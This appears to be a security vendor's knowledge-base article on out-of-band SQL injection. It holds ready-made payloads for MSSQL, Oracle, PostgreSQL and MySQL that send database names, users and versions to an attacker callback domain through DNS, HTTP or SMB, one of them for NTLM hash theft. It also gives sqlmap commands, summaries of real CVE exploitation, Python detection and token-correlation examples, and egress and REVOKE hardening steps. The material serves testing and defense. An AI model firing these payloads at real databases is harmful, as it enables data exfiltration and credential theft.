Exfiltrates data through a secondary channel such as DNS lookups or HTTP callbacks, useful when in-band responses are not available.
TL;DR
- xp_dirtree is the most reliable OOB vector: it works with default MSSQL privileges.
- Oracle's UTL_HTTP requires an EXECUTE grant on the package.
- Use REPLACE() to handle special characters before embedding a value in a DNS label.

Out-of-band (OOB) SQL injection extracts data through a secondary network channel rather than the HTTP response. Instead of reading data from the response body (union-based, error-based) or inferring it from response behavior (blind boolean, time-based), the attacker causes the database server to initiate outbound network connections — DNS lookups, HTTP requests, or SMB connections — to an attacker-controlled callback server. The extracted data travels as DNS subdomain labels or HTTP request paths.
OOB is used in three scenarios where in-band channels are exhausted: (1) the application returns identical responses for all queries and time-based techniques are unreliable due to network jitter or caching; (2) the application processes requests asynchronously and the HTTP response is returned before query execution completes; (3) WAFs and network controls block known SQL injection patterns in HTTP responses but do not filter outbound DNS from the database tier.
CVE-2024-43468 (Microsoft SCCM, CVSS 9.8, CISA KEV February 2026) included OOB exfiltration via MSSQL xp_dirtree in Synacktiv's published proof-of-concept. The attacker sent a UNC path encoding DB_NAME() as a DNS subdomain to confirm the injection was real before escalating to xp_cmdshell for full OS command execution. No credentials were required for either step.
OOB injection requires a database function capable of initiating outbound network connections — a capability that varies significantly between database engines and privilege levels.
The DNS exfiltration flow: the database constructs a string containing target data, appends an attacker-controlled domain, and performs a DNS lookup. The DNS query travels from the database server's network interface to the attacker's DNS server. The subdomain label is the extracted data.
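A detection-side complement to this flow, added here as an example and not part of the original page or any vendor's tooling: a small Python detector that reads constructed DNS query-log lines, flags database-tier hosts resolving names outside an egress allowlist, and then scores the label shape (depth, length, entropy) that exfiltration through subdomain labels produces. The 10.20.0.0/24 range, the corp.example allowlist and the log lines are assumptions constructed for the example.

```python
import ipaddress
import math
import re
from collections import Counter

# Constructed BIND-style query-log lines, not real traffic. 10.20.0.0/24 stands
# in for the database-tier subnet and the domains are placeholders.
SAMPLE_QUERY_LOG = """\
client 10.20.0.15#53422: query: backup.corp.example IN A +
client 10.20.0.15#53423: query: PROD-CUSTOMERS.abc123.interactsh.com IN A +
client 10.20.0.16#41000: query: sa.Microsoft-SQL-Server-2019.abc123.interactsh.com IN A +
client 10.50.1.9#60001: query: www.example.org IN A +
client 10.20.0.15#53424: query: monitoring.corp.example IN A +
"""

DB_TIER = ipaddress.ip_network("10.20.0.0/24")
# Only names the database tier legitimately needs (backup and monitoring targets).
ALLOWED_SUFFIXES = ("corp.example",)
LOG_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def shannon_entropy(s):
    """Bits per character; concatenated or encoded data scores higher than words."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def parse_query_log(text):
    """Yield (source address, lower-cased qname) for every query line that parses."""
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            yield ipaddress.ip_address(m["src"]), m["qname"].rstrip(".").lower()


def is_allowed(qname):
    return any(qname == s or qname.endswith("." + s) for s in ALLOWED_SUFFIXES)


def classify(src, qname):
    """Return the reasons a query looks like OOB exfiltration, or [] if it is benign.

    A database server has no business resolving arbitrary external names, so the
    allowlist miss is the primary signal; label shape adds supporting evidence.
    """
    if ipaddress.ip_address(src) not in DB_TIER or is_allowed(qname):
        return []
    reasons = ["database-tier host resolved a name outside the egress allowlist"]
    labels = qname.split(".")
    # Labels left of the registrable domain (approximated as the last two labels)
    # are where xp_dirtree-style payloads place DB_NAME(), @@version and similar.
    data_labels = labels[:-2]
    if len(data_labels) >= 2:
        reasons.append("%d labels below the registrable domain" % len(data_labels))
    longest = max(data_labels, key=len, default="")
    if len(longest) > 12:
        reasons.append("long label '%s' (%d chars)" % (longest, len(longest)))
    if shannon_entropy("".join(data_labels)) > 3.5:
        reasons.append("high-entropy label data")
    return reasons


def detect(text):
    """Run classify() over a query log and return one alert dict per suspicious query."""
    alerts = []
    for src, qname in parse_query_log(text):
        reasons = classify(src, qname)
        if reasons:
            alerts.append({"src": str(src), "qname": qname, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_QUERY_LOG):
        print(alert["src"], alert["qname"])
        for r in alert["reasons"]:
            print("   -", r)
```

On the constructed log the two queries from the database subnet to the interactsh.com domain are flagged, the workstation query to an external site is not (wrong source tier), and the backup and monitoring lookups pass the allowlist. The allowlist check is the one that matters operationally; the label heuristics only order the alerts for triage.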
xp_dirtree is an undocumented MSSQL extended stored procedure that lists directory contents of a network path. When given a UNC path (\\hostname\share), MSSQL performs DNS resolution for the hostname component. This DNS query is observable at the attacker's DNS server.
-- Basic DNS ping — confirm OOB channel works
'; EXEC master..xp_dirtree '\\attacker.interactsh.com\a'--
-- Data exfiltration — DB_NAME() in subdomain
'; EXEC master..xp_dirtree '//' + DB_NAME() + '.attacker.interactsh.com/a'--
-- User and version in subdomain
'; EXEC master..xp_dirtree '//' + SYSTEM_USER + '.' + @@version + '.attacker.interactsh.com/a'--
-- RFC 1035-safe encoding (handles spaces, slashes, colons in values)
DECLARE @v NVARCHAR(256);
SELECT @v = DB_NAME();
SELECT @v = REPLACE(@v, ' ', '-');
SELECT @v = REPLACE(@v, '/', '-');
DECLARE @cmd NVARCHAR(4000);
SET @cmd = '\\' + @v + '.attacker.interactsh.com\a';
EXEC master.dbo.xp_dirtree @cmd;

xp_fileexist alternative (less common, same privilege level):
'; EXEC master..xp_fileexist '\\' + DB_NAME() + '.attacker.interactsh.com\test'--

xp_dirtree requires no special database privileges beyond the default user context in MSSQL — it is enabled by default and works with any authenticated database session, making it the most accessible OOB vector.
Oracle provides two OOB paths with different privilege requirements.
UTL_HTTP (requires EXECUTE on UTL_HTTP package):
-- HTTP callback with data in URL path
' UNION SELECT UTL_HTTP.REQUEST(
'http://attacker.interactsh.com/' || (SELECT user FROM dual)
) FROM dual--
-- DNS via UTL_INADDR (requires EXECUTE on UTL_INADDR)
' UNION SELECT UTL_INADDR.GET_HOST_ADDRESS(
(SELECT user FROM dual) || '.attacker.interactsh.com'
) FROM dual--

XMLTYPE OOB (does not require UTL_HTTP — works via XML external entity resolution):
' UNION SELECT EXTRACTVALUE(
XMLTYPE('<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY % remote
SYSTEM "http://' || (SELECT user FROM dual) || '.attacker.interactsh.com/">
%remote;]>'),
'/l'
) FROM dual--

The XMLTYPE technique leverages Oracle's XML processing engine to resolve an external entity reference. The SYSTEM URL contains the target data as a subdomain. This bypasses the UTL_HTTP privilege requirement and is frequently overlooked by database security configurations that restrict standard network packages.
-- dblink HTTP callback (requires dblink extension)
'; SELECT dblink_connect(
'host=' || (SELECT current_user) || '.attacker.interactsh.com user=a password=a dbname=a'
)--
-- COPY TO PROGRAM DNS (requires superuser privilege)
'; COPY (SELECT '') TO PROGRAM
'nslookup ' || current_user || '.attacker.interactsh.com'--
'; COPY (SELECT current_database()) TO PROGRAM
'curl http://attacker.interactsh.com/' --

The COPY TO PROGRAM technique executes a shell command on the PostgreSQL server host, enabling any outbound connection method available on the host OS. This requires the pg_execute_server_program role (superuser in PostgreSQL < 14).
-- DNS via LOAD_FILE UNC path (Windows MySQL only, requires FILE privilege)
' AND LOAD_FILE(CONCAT('\\\\', (SELECT version()), '.attacker.interactsh.com\\a'))-- -
-- NTLM hash theft via UNC path
' AND LOAD_FILE('\\\\attacker.smb.server\\share')-- -

This technique is limited to MySQL running on Windows with the FILE privilege granted and secure_file_priv unset. It is rare in modern deployments but common in legacy shared hosting environments.
BreachVex implements a unique-per-injection-point token registry for OOB confirmation:
# DBMS-specific out-of-band DNS payloads
oob_dns_payloads = {
"mysql": "' UNION SELECT LOAD_FILE(CONCAT('\\\\',version(),'.{subdomain}\\a'))-- -",
"postgresql": "'; COPY (SELECT '') TO PROGRAM 'nslookup {subdomain}'-- -",
"mssql": "'; EXEC master..xp_dirtree '\\\\{subdomain}\\a'-- -",
"oracle": "' UNION SELECT UTL_HTTP.request('http://{subdomain}/') FROM dual-- -",
}
# OOB token flow:
# 1. Provision a unique out-of-band callback token per injection point
# 2. Embed the token in the DBMS-specific DNS payload
# 3. Inject into storage endpoint (store/register/profile)
# 4. Trigger retrieval endpoint (export/admin/search)
# 5. Listen for inbound DNS/HTTP callbacks
# 6. Match callback token to injection point → CONFIRMED

This architecture enables second-order OOB detection: the payload is stored at one endpoint and executes when another endpoint retrieves and re-uses the stored value. Standard DAST scanners cannot detect this without second-URL configuration.
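The token flow above, written out as an added Python example (not BreachVex's code): a registry that issues a random per-injection-point token, then maps inbound callback names back to the injection point and to any data labels prefixed in front of the token. The oob.example domain, the endpoints and the observed callback names are constructed for the example; the only thing the code sends anywhere is nothing, it just correlates what a listener has already recorded.

```python
import secrets
from dataclasses import dataclass

# Placeholder callback domain (constructed for this example); a real engagement
# points this at its own Interactsh or equivalent listener.
CALLBACK_DOMAIN = "oob.example"


@dataclass(frozen=True)
class InjectionPoint:
    """Where the payload is stored and which endpoint later re-uses the value."""
    store_endpoint: str
    parameter: str
    trigger_endpoint: str


class TokenRegistry:
    """One random token per injection point, so a callback identifies its origin
    even when the storing and triggering requests are minutes apart."""

    def __init__(self, domain=CALLBACK_DOMAIN):
        self.domain = domain
        self._points = {}

    def provision(self, point):
        token = secrets.token_hex(6)  # 12 hex chars: a valid, short DNS label
        self._points[token] = point
        return "%s.%s" % (token, self.domain)

    def match(self, qname):
        """Map an observed callback name to (injection point, exfiltrated data).

        Payloads may prepend data as extra labels (DB_NAME(), @@version), so the
        token is taken from the label directly left of the callback domain.
        Returns None for names that do not carry a token this registry issued.
        """
        qname = qname.rstrip(".").lower()
        suffix = "." + self.domain
        if not qname.endswith(suffix):
            return None
        labels = qname[: -len(suffix)].split(".")
        point = self._points.get(labels[-1])
        if point is None:
            return None
        data = ".".join(labels[:-1]) or None
        return point, data

    def confirm(self, observed_qnames):
        """Group observed callbacks by the injection point they confirm."""
        confirmed = {}
        for q in observed_qnames:
            hit = self.match(q)
            if hit is not None:
                point, data = hit
                confirmed.setdefault(point, []).append(data)
        return confirmed


def run_scenario():
    """Constructed walk-through of the six-step flow with two injection points."""
    registry = TokenRegistry()
    report = InjectionPoint("/api/report/", "dateRange", "/api/report/ExportToExcel")
    profile = InjectionPoint("/profile", "displayName", "/admin/users")
    report_host = registry.provision(report)
    registry.provision(profile)
    # Constructed listener output: the report token fires carrying a DB name,
    # the profile token never fires, and an unrelated name is ignored.
    observed = [
        "prod-customers." + report_host,
        "deadbeefcafe." + registry.domain,
        "www.example.org",
    ]
    return registry.confirm(observed), report, profile


if __name__ == "__main__":
    confirmed, _, _ = run_scenario()
    for point, data in confirmed.items():
        print("CONFIRMED", point.store_endpoint, point.parameter, "via", point.trigger_endpoint, data)
```

The per-point token is what makes the second-order case tractable: because the trigger endpoint may run hours after the store request, nothing in the callback's timing ties it to a request, only the token does. Unknown tokens are dropped rather than logged as findings, which keeps stray traffic to the listener from producing false confirmations.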
CVE-2024-43468 — Microsoft SCCM (CVSS 9.8, CISA KEV February 2026) — Pre-authenticated SQL injection in Microsoft Configuration Manager's MP_Location service. Synacktiv's public PoC (published November 2024) used xp_dirtree OOB to confirm injection by exfiltrating DB_NAME() as a DNS subdomain. The confirmation served as proof before escalating to stacked queries (EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE) for full OS shell access. CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Federal agencies had until March 5, 2026 to patch.
HackerOne #435066 — HackerOne GraphQL Endpoint — SQL injection in HackerOne's own /graphql endpoint via the embedded_submission_form_uuid parameter. The researcher used OOB DNS callbacks to confirm blind injection and extract data from both public and private schema tables, demonstrating that OOB techniques apply to GraphQL API endpoints — not just traditional web forms.
MOVEit Transfer (CVE-2023-34362, CVSS 9.8, 2023) — Zero-day SQL injection in Progress Software's MOVEit Transfer. Cl0p ransomware group exploited the vulnerability using a combination of SQLi techniques including OOB exfiltration to extract files from organizational file transfer systems. The attack affected 80% of US corporate victims before patching. Amazon employee data was among the records subsequently sold.
NetSPI Second-Order OOB Research (2024) — NetSPI published research demonstrating the complete second-order OOB attack chain: store a payload with xp_dirtree in a date range field via /api/report/; trigger execution via /api/report/ExportToExcel; observe the DNS callback at the attacker-controlled domain. The research showed that a 20-second WAITFOR DELAY confirmation and DNS-based data exfiltration are achievable via stored SQL injection that bypasses all input validation at the entry point.
xp_dirtree is enabled by default on MSSQL and does not require elevated database privileges. WAFs inspecting HTTP request parameters cannot see outbound DNS queries from the database server tier. OOB injection bypasses both input validation and WAF protection simultaneously. The only effective control is network egress filtering at the database server level and parameterized queries.
abc123.interactsh.com).
'; EXEC master..xp_dirtree '\\abc123.interactsh.com\a'-- into MSSQL parameters.
'; SELECT pg_sleep(0); COPY (SELECT '') TO PROGRAM 'nslookup abc123.interactsh.com'-- for PostgreSQL.
' UNION SELECT UTL_HTTP.request('http://abc123.interactsh.com/') FROM dual-- for Oracle.
sqlmap --second-url or manually trigger retrieval endpoints after storing payloads.

# sqlmap OOB with Interactsh domain
sqlmap -u "https://target.com/search?q=1" \
--dns-domain=abc123.interactsh.com \
--technique=Q --batch
# MSSQL-specific OOB
sqlmap -u "https://target.com/search?q=1" \
--dbms=mssql --technique=Q \
--dns-domain=abc123.interactsh.com --batch
# Second-order OOB
sqlmap -u "https://target.com/store" \
--data="field=*" \
--second-url="https://target.com/trigger" \
--dns-domain=abc123.interactsh.com \
--technique=Q --batch

BreachVex detects OOB injection using a unique-per-injection-point callback token registry: each injection point receives a unique out-of-band callback token, the DBMS-specific DNS payload is injected, and inbound callbacks are monitored. A callback matching the token confirms the injection with high confidence.
Parameterized queries prevent injection at the application layer. Network egress filtering prevents OOB exfiltration at the infrastructure layer, providing defense-in-depth.
Database server egress rules (principle of least network privilege):
ALLOW outbound → database backup destination
ALLOW outbound → trusted monitoring endpoints
DENY outbound → port 53 (DNS) [block OOB DNS]
DENY outbound → port 80/443 (HTTP) [block UTL_HTTP, dblink]
DENY outbound → port 445 (SMB) [block xp_dirtree UNC/NTLM]
DENY all other outbound

-- MSSQL: xp_cmdshell is a server configuration option; xp_dirtree has no such switch,
-- so it is restricted by revoking EXECUTE (below) rather than via sp_configure
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
-- Revoke execute on xp_dirtree
REVOKE EXECUTE ON master.dbo.xp_dirtree FROM PUBLIC;
REVOKE EXECUTE ON master.dbo.xp_fileexist FROM PUBLIC;
REVOKE EXECUTE ON master.dbo.xp_cmdshell FROM PUBLIC;

-- Oracle: revoke UTL_HTTP and UTL_INADDR grants
REVOKE EXECUTE ON UTL_HTTP FROM PUBLIC;
REVOKE EXECUTE ON UTL_INADDR FROM PUBLIC;
-- Note: XMLTYPE OOB requires Oracle Text restriction — consult Oracle documentation

Network egress filtering at the database tier is a high-value control that is frequently missing. Many organizations apply WAF rules to HTTP inputs but leave database servers with unrestricted outbound internet access. This allows OOB exfiltration even when all in-band injection channels are blocked.
Out-of-band SQL injection causes the database server to initiate outbound network connections — typically DNS lookups or HTTP requests — to an attacker-controlled callback server. Extracted data is encoded in the subdomain label or HTTP request path, bypassing in-band response channels entirely.
xp_dirtree is an undocumented MSSQL extended stored procedure that accesses network paths. When given a UNC path pointing to an attacker-controlled domain (e.g., \\DB_NAME().attacker.com\a), MSSQL performs a DNS resolution for that domain, creating an observable DNS callback that confirms injection and exfiltrates data.
UTL_HTTP and UTL_INADDR require EXECUTE grants on those packages, which are not granted by default. However, the XMLTYPE OOB technique via XML external entities does not require UTL_HTTP and works on most Oracle installations with Oracle Text enabled, making it a more reliable option.
Interactsh is an open-source OOB interaction server developed by ProjectDiscovery that captures DNS, HTTP, and SMTP callbacks with unique subdomain tokens. BreachVex provisions a unique out-of-band callback token per injection point, embeds it in the OOB payload, listens for inbound DNS/HTTP callbacks, and confirms injection when a callback carrying the matching token is received.
CVE-2024-43468 (Microsoft SCCM, CVSS 9.8) used MSSQL xp_dirtree OOB chaining as part of the pre-authenticated RCE exploit chain. The Synacktiv PoC used xp_dirtree to exfiltrate the DB_NAME() value via DNS callback as proof of exploitation before escalating to xp_cmdshell.
RFC 1035 limits DNS labels to 63 characters, alphanumeric plus hyphens. Database names containing spaces, slashes, or special characters must be transformed before embedding in a DNS subdomain. MSSQL REPLACE() removes spaces; SUBSTRING() chunks long values across multiple DNS queries.
PostgreSQL supports two OOB techniques: dblink_connect() for callbacks (requires the dblink extension), and COPY TO PROGRAM with nslookup or curl (requires superuser privilege). The dblink approach works at lower privilege levels but requires the dblink extension to be installed.